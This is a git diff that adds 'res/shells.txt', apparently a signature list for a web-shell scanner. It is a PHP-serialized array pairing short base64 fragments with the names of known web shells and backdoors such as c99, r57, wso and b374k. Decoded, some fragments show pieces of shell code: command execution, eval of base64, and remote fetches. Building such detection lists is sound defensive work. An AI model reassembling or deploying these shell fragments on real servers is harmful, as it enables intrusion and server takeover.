+MlU5SjFkbFltIjtzOjE3OiJjb2RlcnpbMl1bMF1bcGhwXSI7czo2NDoiSE9XdFFWa0pRVlRGUksx
+QkhiSFZqU0ZZd1NVaFNOV05IVlRsaFIyeHJXa2RXZFVsSE5XaGlWMVU1V1ZkT01FbCI7czoyMToi
+bG9jdXNzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJOcGRHVXNJRGd3TENBa1pYSnlibThzSUNSbGNu
+SnpkSElzSURNd0tUc2dEUXBwWmlBb0lTUm1jQ2tnZXlBTkNpIjtzOjE5OiJuaXhzaGVsbFsxXVsw
+XVtwaHBdIjtzOjY0OiJWL2paQXhVSUJPMGM4ektjU210MXJnTmhOMHk4Z21PeHB3bHhkRzREWkxK
+QVY1dHFkcHFtS3d1cDVFeUM2SlQyIjtzOjE5OiJ3ZWJhZG1pblsxXVsyXVtwaHBdIjtzOjY0OiI5
+bk93b0tJQ0JwWmlBb0pISmxjWFZwY21VcElIc0tJQ0FnSUNNZ1lXeHNJR1p2ZFc1a0lHZHZibTVo
+SUdKbElHIjtzOjE3OiJ0ZWxuZXRkWzJdWzBdW3BsXSI7czo2NDoiaHlaV1k5SWlWelAzZHZjbXRm
+WkdseVBTVnpJajRsY3p3dllUNHZ0Q3dLSkZCSVVGOVRSVXhHTENCMWNteGxibSI7czoxOToicGhw
+c2hlbGxbM11bMF1bcGhwXSI7czo2NDoiMFpYSStQSFJoWW14bFBqeDBjajQ4ZEdRK1BHWnZjbTBn
+WVdOMGFXOXVQVndpSkZOR2FXeGxUbUZ0WlQ4a2RYSiI7czoxOToic2FmZW1vZGVbM11bMF1bcGhw
+XSI7czo2NDoiY21GdVoyVW9Ja0VpTENKYUlpa2dZWE1nSkd4bGRIUmxjaWtnRFFvSmV5QU5DZ2tr
+WW05dmJDQTlJRUJwYzE5ayI7czoyMDoiZGV2aWx6MGRlWzBdWzBdW3BocF0iO3M6NjQ6IjBaRDVj
+YmlJN0RRcHdjbWx1ZENBaVBIUmtQbHNnUEdFZ1kyeGhjM01nUFNCY0ltaGxZV1JjSWlCb2NtVm1J
+RDAiO3M6MTc6Imxvc3RkY1sxXVswXVtwaHBdIjtzOjY0OiJTVzVNYldnd1lsZDRlbU5IVm1waFYw
+WnpXVEpvYUdOdVRXOUtSamxSVkRGT1ZWZDVaR2hLTVRCd1RHbGphVkJwIjtzOjIwOiJ2MGxkM20w
+cnRbMF1bMF1bcGhwXSI7czo2NDoiY01tSnZkRnd5WFRvZ2NHaHdZbTkwSURJdU1DQmllVHNnSTJO
+eVpYZEFZMjl5Y0M0aUtUc05DaUFnSUNBZ0lDQSI7czoxNToicGJvdFsyXVswXVtwaHBdIjtzOjY0
+OiJRdFkyOXNiM0k2SUNNd01EQXdNREE3Q24wS0xuTjBlV3hsTkNCN1ptOXVkQzEzWldsbmFIUTZJ
+R0p2YkdSOUNtIjtzOjE1OiJrcmFsWzBdWzBdW3BocF0iO3M6NjQ6IlpHMUdjMlJYVlRsSmJFcHNZ
+bTFHZEZwVU9HbEpRemdyUkZGdk9GQXpRbTlqUTBJNVNVZFdjMk15Vm5CYWFXZHIiO3M6MTc6Imhz
+aGVsbFswXVswXVtwaHBdIjtzOjY0OiJOMkpDYmxGMmRXUjRXREp1WlZadEt6Um9NekI0TjFBeFVF
+aDJXblZIWWl0WVpub3hWbVpoY2tsaGFqWmljV2haIjtzOjIwOiJob3N0ZGV2aWxbMF1bMF1bcGhw
+XSI7czo2NDoiOUlFTnZiVzFoYm1SVWVYQmxMbFJsZUhRN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqYjIx
+dExrTnZiVzFoYm1SVVpYaCI7czoyMjoiYXNweC1zaGVsbFswXVswXVthc3B4XSI7czo2NDoiQ0l2
+SWl3Z0pHNWhiV1VwT3dva1puSWdQU0FpWEhnMU1GeDROR0pjZURBelhIZ3dOQ0k3Q2lSbWNpQXVQ
+U0FpWCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IklIc2dhV1lnS0NG
+cGMxOXVkVzFsY21saktDUm1jV0pmYkdWdVoyaDBLU2tnZXlSbWNXSmZiR1Z1WjJoMElEMGciO3M6
+MjI6IkZhVGFMaXNUaUN6WzRdWzBdW3BocF0iO3M6NjQ6Im1kcGJpMXNaV1owT2lBMWNIZzdEUXA5
+RFFwcGJuQjFkQ0FzSUhSbGVIUmhjbVZoSUN3Z1luVjBkRzl1SUN3Z1kiO3M6Mjc6ImJydXRlX2Zv
+cmNlX3Rvb2xbMV1bMF1bcGhwXSI7czo2NDoiZ0lEaHdkQ0FnSUNBZ0lDQWhhVzF3YjNKMFlXNTBP
+d3BpWVdOclozSnZkVzVrTFdOdmJHOXlPaUFnSUNNeE1URSI7czoxODoiY3J5c3RhbFswXVswXVtw
+aHBdIjtzOjY0OiJjR1U5WENKMFpYaDBYQ0krUEdKeVBncDFjMlZ5Ym1GdFpTQTZJRHhKVGxCVlZD
+QnphWHBsUFZ3aU1UVmNJaUIyIjtzOjE3OiJ1cGRhdGVbMF1bMF1bcGhwXSI7czo2NDoiWEUzVTFJ
+dlVITmFSRFp3V2xBNU1XTk5WQzlNT0ZkWFJYcExkbUptVkV4Sk9GaGpOa0ZxVm5wcmRuWjJOMnBw
+TiI7czoyMjoiRmFUYUxpc1RpQ3pbNV1bMF1bcGhwXSI7czo2NDoiNWpkR2x2Ym5Nc0ozTm9aV3hz
+WDJWNFpXTW5LU2w3SkdWNFpXTTlJSE5vWld4c1gyVjRaV01vSkdOdmJXMWhibSI7czoxNzoiamFj
+a2FsWzVdWzBdW3BocF0iO3M6NjQ6ImpibFZ1UzFOcloyVXpRbWhqTTA0d1lVaEtNVXREVW1aVmEx
+WlNWbFZXVkZaR2MyNWhSemt4V2tkc2RXRlRaR1IiO3M6MTQ6ImNtZFs1XVswXVtwaHBdIjtzOjY0
+OiIxUm5ObTkwSzNoRVZsbE1UM05EZGk5YWVtaDFSekZaVlZZNWRHOWhXbWRYVFVobVpWRkhUbGsz
+ZFV4M01rTmtXIjtzOjE1OiJjOTlbMjNdWzBdW3BocF0iO3M6NjQ6IjFjSGdnT0hCNElDRnBiWEJ2
+Y25SaGJuUTdZbTl5WkdWeU9pQnViMjVsSUNGcGJYQnZjblJoYm5RN1ltOXlaR1YiO3M6MjA6ImNv
+bmZpZ3NweVsyXVswXVtwaHBdIjtzOjY0OiIwWm1ZdllsVlpSVmhrYkc4d2MxWkdla1U0UTJFNVFW
+UkRObEZ3Wld0aVprRlFVbEkyUlZwcU5GQmpkSGN5ZWpWIjtzOjIyOiJib2dlbF9zaGVsbFswXVsw
+XVtwaHBdIjtzOjY0OiJKRjlRVDFOVVd5ZHpibTRuWFRzS2ZRcDlJR1ZzYzJVZ2V3b2tkVEZ3UFNS
+ZlIwVlVXeWR6Ym00blhUc0tmUXA5IjtzOjIyOiJzbmlwZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0
+OiIyTnlhV0pwYm1jZ2RHaGxJR1J5YVhabElIUjVjR1VnYjJZZ1lTQm5hWFpsYmlCRWNtbDJaU0J2
+WW1wbFkzUXVEIjtzOjE4OiJleHBsb3JlWzBdWzBdW2FzcF0iO3M6NjQ6ImdvZ0lDQWdJQ0FnSUNB
+Z1BIUmtJR0ZzYVdkdVBTSmpaVzUwWlhJaUlHTnNZWE56UFNKMGFYUnNaU0krUkdGMFkiO3M6MTY6
+Im15c3FsWzRdWzBdW3BocF0iO30=
diff --git a/res/shells.txt b/res/shells.txt
new file mode 100644
index 0000000000000000000000000000000000000000..ed899f28d7050e7b495fe182396e07e4099ada39
--- /dev/null
+++ b/res/shells.txt
@@ -0,0 +1,1199 @@
+a:604:{s:64:"XRpbyAqIC43NSk7DQoNCiAgICBmb3IgKCRpID0gMDsgJGkgPCAkbWJfbGVuZ3RoO";
+s:21:"phpemailer[0][2][php]";
+s:64:"OwkJCQoKCWRlZmF1bHQ6CgkJc2hvd19scygpOwp9CgpmdW5jdGlvbiBzaG93X2xz";
+s:15:"cmd[31][0][php]";
+s:64:"Zdko5TTNUR3JIL2RvV0M0WG1BRWtZVndBQ1VQUWQwR2w0N3VEalIiLCJjMkdybVR";
+s:17:"noname[1][0][php]";
+s:64:"2hvICINCgkJCQkNCgkJICAgIAk8dHI+DQoJCQkgICAgICA8dGQgd2lkdGg9JzEwJ";
+s:22:"hiddenshell[0][0][php]";
+s:64:"cm9sOiBuby1jYWNoZVxuIjsNCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRt";
+s:14:"cmd[24][0][pl]";
+s:64:"JyPgogICAgICAgIDxiciAvPjxiciAvPiA8L2ZvbnQ+CiAgICAgICAgICAgICAgPD";
+s:19:"s72shell[0][0][php]";
+s:126:"GRlZmF1bHRfdXNlX2FqYXggPSB0cnVlOyAkZGVmYXVsdF9jaGFyc2V0ID0gJ1dpbmRvd3MtMTI1MSc7IGlmKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5";
+s:25:"cocacola_shell[0][0][php]";
+s:64:"PEZPUk0gRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgQUNUSU9OPSJ1cGxv";
+s:26:"shell_uploader[10][0][php]";
+s:64:"WFyZ2luLWxlZnQ6NXB4OyBtYXJnaW4tcmlnaHQ6NXB4Oyc+bG9naW46PC9zcGFuP";
+s:14:"cih[0][0][php]";
+s:64:"ZikuIikhPC9iPjwvY2VudGVyPiI7fQ0KICBlbHNlIHtlY2hvICI8Y2VudGVyPjxi";
+s:15:"c99[26][0][php]";
+s:64:"hbWUoKS4iXG4iOw0KPz4NCjxocj48L3ByZT4NCiAgICA8dGFibGU+PGZvcm0gbWV";
+s:20:"lamashell[0][0][php]";
+s:64:"FUlsnUkVNT1RFX0FERFInXTtlY2hvICIgc2l6ZT0xNz48L3RkPjwvdHI+PHRyPjx";
+s:17:"jackal[1][0][php]";
+s:64:"CgkJCWFycmF5X3BvcCgkZXh4KTsNCg0KCQkJPz4NCg0KCQkJRGlyZWN0b3J5IENv";
+s:17:"cshell[0][0][php]";
+s:64:"azE1MC5kZS93L2RkIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZGQiKTsgDQpzeXN0";
+s:17:"troyan[0][0][php]";
+s:64:"QZ0lSNnJWUFdtRjFaVmtmeHJBLzRHU1EyK3ZHZ2NGWVdaeFZidUlxY0w0MlNNSTJ";
+s:17:"b374k[13][0][php]";
+s:64:"ldGMvaHR0cGQuY29uZg0KL2V0Yy9wdXJlLWZ0cGQuY29uZg0KL2V0Yy9wdXJlLWZ";
+s:20:"phpshell[32][0][php]";
+s:64:"LVUnLCAnY3A4NjYnKTsKCSRvcHRfY2hhcnNldHMgPSAnJzsKCWZvcmVhY2goJGNo";
+s:19:"filesman[9][0][php]";
+s:64:"OnR/VUAjQCZkN2QiK2QyS3gvfyBJf05rTW5eWSxKNFlPd2wmSmhBaGMvWCgrLlJx";
+s:20:"cyberspy5[0][0][asp]";
+s:64:"FjdGlvbj0naHR0cDovL3d3dy5oYXNoY2hlY2tlci5kZS9oYXNoLmNnaT8nO2RvY3";
+s:20:"filesman[14][0][php]";
+s:64:"5QVVQgdHlwZT1zdWJtaXQgdmFsdWU9J1J1bic+DQo8L0ZPUk0+DQoNCjwlQCBwYW";
+s:15:"cmd[18][0][jsp]";
+s:64:"ycW1CcFdFd3VRbUUxM0E3bldZRWJNS1dWNW42cjBlNCt6aGR6UjcreEFTekJkTHd";
+s:20:"phpshell[33][0][php]";
+s:59:"PGEgaHJlZj0iaHR0cDovL3d3dy5wb2xpc2huZXdzLmNvbS9pbmRleC5waHA";
+s:24:"spam_trustapp[0][1][php]";
+s:64:"ZXMgPTxJTkZPPiA7CmNsb3NlKElORk8pOwpzeXN0ZW0oQGxpbmVzKTsKcHJpbnQn";
+s:24:"arab_black_hat[0][0][pl]";
+s:64:"IDwvdGFibGU+DQogICAgICAgIA0KDQonOyANCg0KPz4NCjxib2R5IGJnY29sb3I9";
+s:20:"indishell[0][0][php]";
+s:64:"PD9QSFAKJGZpbGUgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2hhY2tlcmxh";
+s:19:"savefile[0][0][php]";
+s:64:"yc3RhdHVzIik7IA0KICAkc3FscXVpY2tsYXVuY2hbXSA9IGFycmF5KCJTZXJ2ZXI";
+s:19:"gnyshell[0][0][php]";
+s:64:"cGFuPjwvZm9udD48Zm9udCBjb2xvcj0iIzFEMUQxRCIgZmFjZT0iVGFob21hIiBz";
+s:19:"hackerps[0][0][php]";
+s:64:"md0aDogIiAuIHN0cmxlbigkdGhpcy0+YXJjaGl2ZSkpOw0KICAgICAgICBoZWFkZ";
+s:25:"phpfilemanager[2][2][php]";
+s:64:"HgyMGZceDIzXHgxN1x4MDFQXHgxMzFceDBkNGZceDNlS1x4MGMwWFx4MTVceDEyX";
+s:22:"joomla_spam[1][1][php]";
+s:64:"fUkVRVUVTVFsndXNlciddKSk/JF9SRVFVRVNUWyd1c2VyJ106IiI7DQppZighZml";
+s:17:"jackal[0][0][php]";
+s:64:"0LkZvcm0oIm1vZGUiKSkKZXhpdCBzdWIKZW5kIGlmCmVuZCBpZgoKSHRtbEhlYWR";
+s:22:"elmaliseker[0][0][asp]";
+s:64:"b2NrZXQsICJQUklWTVNHICRwcmludGwgOiBObWFwIFBvcnRTY2FuIDEyOi4gNHwg";
+s:17:"irc_bot[0][0][pl]";
+s:64:"ICAgICAgICBlY2hvICI8cHJlPiI7CiAgICAgICAgJGNtZCA9ICgkX1JFUVVFU1Rb";
+s:14:"cmd[4][0][php]";
+s:64:"BIK0RXa1E5MFZqYUtDdVlxanBSQk5jU3VZM25YRHZaVDliSk9yMFlhQm1HbXRqQ2";
+s:19:"phpshell[2][0][php]";
+s:64:"ZSBpZD0idGFibGUyIiBzdHlsZT0iYm9yZGVyLWNvbGxhcHNlOiBjb2xsYXBzZTsi";
+s:18:"teamsql[0][0][php]";
+s:64:"CR1cmwgKQ0KCQl7DQoJCQkkVVJMcGNzID0gKCBwYXJzZV91cmwoICR1cmwgKSApO";
+s:15:"pbot[1][0][php]";
+s:64:"PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUWyJjb21tZW50Il0pKSB7IGV2YWwoYmFz";
+s:15:"cmd[23][0][php]";
+s:64:"l6ZQogICAgICAgIHVpbnQgbkRlZmF1bHRUaW1lT3V0LAkJCQkJCS8vIHRpbWUtb3";
+s:20:"insomnia[0][0][aspx]";
+s:64:"YjI5cmFXVW9JblpwYzJsMGN5SXNKSFpwYzJsMFkyOTFiblFwT3dvdkx5QTNhRFJ1";
+s:23:"antisecshell[0][0][php]";
+s:64:"BIYXZlbmFyZCAtLT4NCjwhLS0gTW9kaWZpZWQgdG8gd29yayB3aXRoIDQ4NDNwaH";
+s:15:"cmd[21][0][php]";
+s:64:"6ZT0iICYgZmkrMyAmICIgc3R5bGU9IiJiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoNDg";
+s:17:"aspydrv[0][0][vb]";
+s:64:"FSYkoyTnRaQ2RkUFQwaVpuUndYMlpwYkdWZmRYQWlLU0FnSUhzZ1FHWjBjRjl3ZF";
+s:20:"951078biJ[0][0][php]";
+s:64:"tBQlp4QUhmNk5JMVR2U202b0R4SlowQ2M5blZHNXBqeG01WDlaRGEyUUNFWGErVE";
+s:20:"phpshell[15][0][php]";
+s:64:"CBjb2xvcj1ncmVlbj4kZC8kZGVsX2YgREVMRVRFRCE8L2ZvbnQ+PC9iPg0KPGJyP";
+s:18:"nstview[0][0][php]";
+s:64:"W1wLnNxbCIpOw0KICAgICAgICBoZWFkZXIoIkNvbnRlbnQtVHlwZTogdGV4dC9wb";
+s:20:"filesman[12][0][php]";
+s:64:"tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZml";
+s:20:"unitxshell[0][0][pl]";
+s:64:"ZHYXJQZnJlOXA5K2hRVnVNVTN1Vmh2NGVUNzJyUklLSXpNL1NIeEY4eTdsQzlLZT";
+s:17:"phpspy[2][0][php]";
+s:64:"AgIDwvdHI+DQogICAgICAgIDwvdGFibGU+DQogICAgICAgIDx0ZXh0YXJlYSBuYW";
+s:23:"antisecshell[2][0][php]";
+s:56:"aHR0cDovLzk1LjE2OC4xOTEuMTE2L0dldExpbmtzLmFzaHg/aG9zdD0=";
+s:19:"getlinks[0][1][php]";
+s:64:"aW4gXCJbJTJdXCI6XG5bJTFdIiwKJ0tvcHlhbGFfZmlsZXMnID0+ICdDb3BpbyBx";
+s:19:"imhapftp[0][0][php]";
+s:64:"6L2FwcHNlcnYvd3d3L3NoZWxscy8iPgogICAgICAgIDxmb250IGNvbG9yPSIjREN";
+s:23:"stressbypass[0][0][php]";
+s:64:"0gc3pDTUQsIHN6VGVtcEZpbGUKCk9uIEVycm9yIFJlc3VtZSBOZXh0CgonIC0tIG";
+s:14:"cmd[1][0][asp]";
+s:64:"9tbWFuZDogPGlucHV0IG5hbWUgPSAnY21kJz5cbiI7DQogICAgICAgICBlY2hvIC";
+s:20:"darkshell[0][0][php]";
+s:7:"version";
+s:10:"1405674947";
+s:64:"icvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5pbmMucGhwJywkdXNlci4nLTMzLnR4d";
+s:20:"configspy[1][0][php]";
+s:64:"VDBNRjhEa3NxcVJjVlBvT1FkUm1hcWc3eExveGMrS1FLUHE3N3p6OVBieHlWYldM";
+s:15:"isko[0][0][php]";
+s:64:"tZSggJF9GSUxFU1sndXBsb2FkZWRmaWxlJ11bJ25hbWUnXSkgb3IgZGllKCRlcnJ";
+s:25:"phpfilemanager[4][0][php]";
+s:64:"IG5hbWU9XCJfY21kXCIgdmFsdWU9XCIiLiRjdXJyZW50Q01ELiJcIj48L3RkPiI7";
+s:16:"worse[0][0][php]";
+s:64:"fZHVtcCk7CmVsc2UKewppZighJHRvX2ZpbGUpCnsKaGVhZGVyKCdDb250ZW50LVR";
+s:15:"zaco[0][0][php]";
+s:64:"nIgLz4iOicnKS4iPC90ZD4iOw0KICAgfQ0KICAgJHNxbGRyLj0iPC90cj5cbiI7D";
+s:16:"mysql[6][2][php]";
+s:64:"TGRDeUsNClVRRmtoYmI2TzhkM3QyLzNqUlRKL0lxU3dDQUlrRVpBRTNiMWJCdTY4";
+s:24:"server_config[0][0][php]";
+s:64:"RsZT4NCiA8c3R5bGU+DQogICB0ZCB7DQogICBmb250LWZhbWlseTogdmVyZGFuYS";
+s:18:"crystal[2][0][php]";
+s:64:"BjOTlwaHBpY3EucGhwID8gaHR0cDovL2NjdGVhbS5udWtsZW9uLnVzDQojIyMjIy";
+s:15:"c99[29][0][php]";
+s:64:"gJyAgRmlsZTogICAgQ21kQXNwLmFzcA0KICAnICBBdXRob3I6ICBNYWNlbyA8bWF";
+s:15:"cmd[16][0][asp]";
+s:64:"aU1NQ2F6ay81N0FlbnV0bjdWTlNkaUFUSXlNL3hoek52YzkyZTF1RVg2U093NHk0";
+s:27:"ahlisyurga_shell[0][0][php]";
+s:64:"4kc3RyKTsNCgkJCQkJYnJlYWs7DQoJCQkJY2FzZSAnbXlzcWwnOg0KCQkJCQlyZX";
+s:14:"wso[0][0][php]";
+s:64:"aUtTQnZjaUJ6ZEhKcGMzUnlLQ1J5WldabGNtVnlMQ0ozWldKaGJIUmhJaWtnYjNJ";
+s:26:"shell_uploader[15][0][php]";
+s:135:"5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79UuSJs5NF1hg64Wlu4uxm+Pvfs+MXlbaF8Bpz3Xdz+9xGxuk0Wj0NhrNjEalXuAHIWsx64f+4LG1s1bquwNn5sedWeR2nD+";
+s:14:"wso[5][0][php]";
+s:64:"i8vVW50dWsgb3B0aW1hbGlzYXNpIHVrdXJhbiBkYW4ga2VjZXBhdGFuLgokaW1nZ";
+s:18:"batavi4[0][0][php]";
+s:64:"AgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIGR1cDIoaW5zb2";
+s:19:"blindshell[0][0][c]";
+s:64:"bWUgLmh0cGFzc3dkIj4NCgkJZmluZCBhbGwgLmh0cGFzc3dkIGZpbGVzPC9vcHRp";
+s:18:"crystal[1][0][php]";
+s:64:"ERRb0pDUWtKQ1RWamFESWdhSFJ0YkhOd05XTTBNV3hqYURGeWN5aEFabkkxTVdRb";
+s:18:"r3laps3[0][0][php]";
+s:64:"ICAgICAgICAgICAgJHZ2ID0gZmFsc2U7CiAgICAgICAgICAgICAgICAgICAgICAg";
+s:19:"w3dshell[0][0][php]";
+s:64:"lYKy9tcUQ4b2FValhwbzBNTk03ZVUrMjY4RzdWOFp0UkRuaFpxSDRCNGVLU3Q0ZF";
+s:16:"b374k[6][0][php]";
+s:64:"VwplYWg0QzVLdUdtaE0xbVg0bHhKUko3RDFSd3ozVlluRFBIYk5sWXI5VytxQnZW";
+s:16:"b374k[4][0][php]";
+s:64:"dCI7Ly9mb3JtYXRvDQokSGF4cGxvcmVyX2FkZHI9JHJlbW90ZV9hZGRyLiJ0b29s";
+s:24:"albanianshell[0][0][php]";
+s:64:"sgZXhpdDsgfSBlbHNlIHsNCgkJJnR5cGUoJGNoYW4sJGJ1ZywkZG9yaywiRGVNb3";
+s:19:"hostdevil[0][0][pl]";
+s:64:"hbHNlKSB7DQoJCQkJaWYgKCRmICE9ICcuJyAmJiAkZiAhPSAnLi4nICYmICFkZWw";
+s:22:"420532shell[0][0][php]";
+s:64:"1pcXQreERmSzNBTTdyYW15QkZSTUV6Yk9KUjBCVzJndjhtbkx5bkhwK3BnUWNKc0";
+s:24:"server_config[1][0][php]";
+s:64:"YWlsOjwvZm9udD48L2Rpdj48L3RkPg0KCQkJPHRkIHdpZHRoPSIxOCUiPjxmb250";
+s:21:"php_mailer[0][1][php]";
+s:64:"J5IHRyxrDhu5tjIGtoaSBi4bqvdCDEkeG6p3UgZ+G7rWkgdGluIG5o4bqvbiBr4b";
+s:26:"shell_uploader[11][0][php]";
+s:64:"bXBsZXRlIGFmdGVyOiB7JGV4ZWNfdGltZX0gc2Vjb25kc1xuIjsNCg0KfQ0KDQpl";
+s:21:"udpflooder[0][0][php]";
+s:64:"1K0RqOEM3bjVGNFZaVjVZVGxhcmpDeWxaRTdlcjEzRHRKZlExcmlVUnJkbWRYeGp";
+s:20:"egyspider[0][0][php]";
+s:64:"WUiOw0KCQkJfQ0KCQkJaWYoIWlzX2FycmF5KCRpbmRleFska25hbWVdKSkgew0KC";
+s:22:"629788tryag[0][0][php]";
+s:64:"AdAD9/1UAQAAjAEAAJgBpAFcAXgA6AEMATgByAGMAcgBIAGoA/f87ACAAWQBLAFc";
+s:16:"efso2[1][0][asp]";
+s:64:"lPVwidGV4dFwiIG5hbWU9XCJhY3RhcmNidWZmX3BhdGhcIiB2YWx1ZT1cInl4X2F";
+s:15:"c99[21][0][php]";
+s:64:"gICAgICAgICAgICIgICAgICAgICAgICAgZmF0YWwoXCJVbmFibGUgdG8gY2hhbmd";
+s:20:"phantasma[0][0][php]";
+s:64:"nZuNGZheGVZWVB0NW1WTTBoYWxNbjFwQmc2Qy9OSFJWYjYxZFFINHlRTnBsSFo0d";
+s:17:"b374k[12][0][php]";
+s:64:"SIpOw0KDQogICAgICAgICAgICAgICAgU3RyZWFtQ29ubmVjdG9yIG91dHB1dENvb";
+s:21:"jspreverse[0][0][jsp]";
+s:64:"fQplbHNlaWYgKCgkbW9kZSAmIDB4NjAwMCkgPT09IDB4NjAwMCkgeyR0ID0gImIi";
+s:15:"c99[19][0][php]";
+s:64:"ZXZhbCgiaWYoaXNzZXQoXCRfUkVRVUVTVFsnY2gnXSkgJiYgKG1kNShcJF9SRVFV";
+s:14:"cmd[0][0][php]";
+s:64:"+Cjxicj4KPGlucHV0IHR5cGU9VEVYVCBuYW1lPSItY21kIiBzaXplPTY0IHZhbHV";
+s:14:"cmd[3][0][php]";
+s:64:"gICAgIGlmICh1bmxpbmsoJGZpbGUpKXsNCiAgICAgICAgICAgICAgICAgICAgaWY";
+s:25:"phpfilemanager[1][2][php]";
+s:64:"pa2Eud3JpdGUgIkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDIiICYgdmJ";
+s:15:"ajan[0][0][asp]";
+s:64:"IC4iIEdCIjsgfQ0KICAgIGVsc2VpZiAoICRzaXplID49IDEwNDg1NzYgKSB7ICRz";
+s:19:"ipays777[1][0][php]";
+s:64:"xiYXItZGFya3NoYWRvdy1jb2xvcjogc2lsdmVyOwogICAgICAgICAgICBzY3JvbG";
+s:19:"safemode[1][0][php]";
+s:64:"ICMgICAgIyMNCi8qICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg";
+s:15:"r57[20][0][php]";
+s:64:"U213VzRKbFNFT0lkYjhGa0lTK1MxTVV1U1dtcTlxVGo2MUJsOHRTZFkwMW4zY3p6";
+s:25:"shell_uploader[1][0][php]";
+s:64:"yc9PicmIzEwNTc7JiMxMDg2OyYjMTA3OTsmIzEwNzY7JiMxMDcyOyYjMTA5MDsmI";
+s:15:"r57[17][0][php]";
+s:64:"ogICAgfQ0KICAgfQ0KICB9DQogICRoZWFkWyRrXSA9ICI8Yj4iLiRoZWFkWyRrXS";
+s:14:"c99[9][0][php]";
+s:64:"SIpOyBleGl0OyB9CgovL01haGtlbWUgRWtsZW50aXNpbmUgWWFrYWxhbiYjMzA1O";
+s:18:"mahkeme[0][0][php]";
+s:64:"vbmc+CjxiPjx1PjxjZW50ZXI+PD9waHAgZWNobyAiVGhpcyBzZXJ2ZXIgaGFzIGJ";
+s:20:"rootshell[3][0][php]";
+s:64:"FiYzU1YjgiOyAjcm9vdA0KJGNvbG9yID0gIiNkZjUiOw0KJGRlZmF1bHRfYWN0aW";
+s:20:"filesman[10][0][php]";
+s:64:"hbD0kZGlyX2F0dWFsJythcmcrJy8nOw0KfQ0KZnVuY3Rpb24gc2hvd19uYW1lcyg";
+s:25:"phpfilemanager[0][2][php]";
+s:64:"WExDaFVXZjNJTjRRc1FTRVI4bCt1WUdQZnFqQ2d5VjFWMFR0Y1pQdDJVMndGaUlj";
+s:21:"clearshell[0][0][php]";
+s:64:"wYXNzd2Q8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9Im5ldHN0YXQgLWFuIHwgZ3J";
+s:18:"lizozim[1][0][php]";
+s:64:"pOw0KIH0NCiBpZigkX1BPU1RbJ3Bhc3MnXSA9PSAkcGFzc3dvcmQpDQogew0KICA";
+s:20:"ironshell[2][0][php]";
+s:64:"YzZ1krVnRRQ2FJRVBhclpldjdJOTJWQTNnS1Z2ZVEwNjhrM25CdmNnSDAyTG9JZm";
+s:20:"al-marhum[0][0][php]";
+s:64:"JkZXI9MT4KCjx0ciBiZ2NvbG9yPWdyZWVuPjx0ZD5kMG1haW5zPC90ZD48dGQ+dX";
+s:20:"configspy[3][0][php]";
+s:64:"BocGJiJ10pKSAKeyAKZWNobyAiPGNlbnRlcj48dGFibGUgYm9yZGVyPTAgd2lkdG";
+s:18:"lolipop[0][0][php]";
+s:64:"VUVTVFsnZGlyJ107CgkJJGZuYW1lPSRIVFRQX1BPU1RfRklMRVNbJ2ZpbGVfbmFt";
+s:22:"phpbackdoor[0][0][php]";
+s:64:"JyODF4Uy9xSERlenNJL24wOS9QcDZlZVg4Wi9LdlQ5SisvZVpyK0d1YThwdkdtZV";
+s:22:"devilzshell[0][0][php]";
+s:64:"bWVudC5jcmVhdGVFbGVtZW50KCJwcmUiKTsNCl9hLnN0eWxlLmRpc3BsYXk9Imlu";
+s:29:"ajax_command_shell[1][0][php]";
+s:64:"cGU9dGV4dCIuQCRfUE9TVFsnZmlsZSddLiI+PGJyPiI7CmVjaG8gIjxpbnB1dCB0";
+s:17:"nshell[0][0][php]";
+s:64:"GVhZGVyIC49ICIkbWVzc2FnZVxyXG4iOw0KICAgICAgSWYgKCRmaWxlX25hbWUpI";
+s:15:"spam[2][0][php]";
+s:64:"MjEgXG4iOyAKfSAKdXNlIFNvY2tldDsgCnVzZSBGaWxlSGFuZGxlOyAKc29ja2V0";
+s:22:"connectback2[0][0][pl]";
+s:64:"pOng6L2cpewombGlsKCQxKTsKcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7CmZvcig";
+s:17:"king511[0][0][pl]";
+s:64:"CgkJIGlmIChzdHIuaW5kZXhPZihkb3QsKGxhdCsyKSk9PS0xKXsKCgkJICAgIGFs";
+s:36:"cristercorp_infocollector[1][0][php]";
+s:64:"Xh0PSIjN2E3YzdkIj4NCiAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPg0KICAgI";
+s:18:"teamsql[1][0][php]";
+s:64:"CAgICAgICBjb250YWluaW5nIGEgYC4nIGZvbGxvd2VkIGJ5IG90aGVyIHRleHQga";
+s:15:"smtpd[0][1][py]";
+s:64:"MGR6YU81dEhjMmp1YlIzTm83bTBkemEKTzV0SGMyanViUjNObzdtMGR6YU81dEhj";
+s:19:"dc3shell[0][0][php]";
+s:64:"gkX1BPU1RbJ2NvbW1hbmQnXSk7DQplY2hvICI8L3RleHRhcmVhPiI7DQpleGl0Ow";
+s:19:"dc3shell[1][0][php]";
+s:64:"2UuY29tCgogIENvcHlyaWdodCAoYykgMjAwMyBvc0NvbW1lcmNlCgogIFJlbGVhc";
+s:15:"cmd[34][0][php]";
+s:138:"k1peGwyQUpiTWRlU05Ldkw1QW9hbzg3T3pzenUxdDY0WlRGOWVKdTRJNVVCN0lpMG9pK0E0MU1PT0FJN3kxTVZVQlY3WGdITkZ3dTdpbzk4cWdIM0NBNnRlc1I2TXVJSHI0cS9SMVE";
+s:16:"pzadv[0][1][php]";
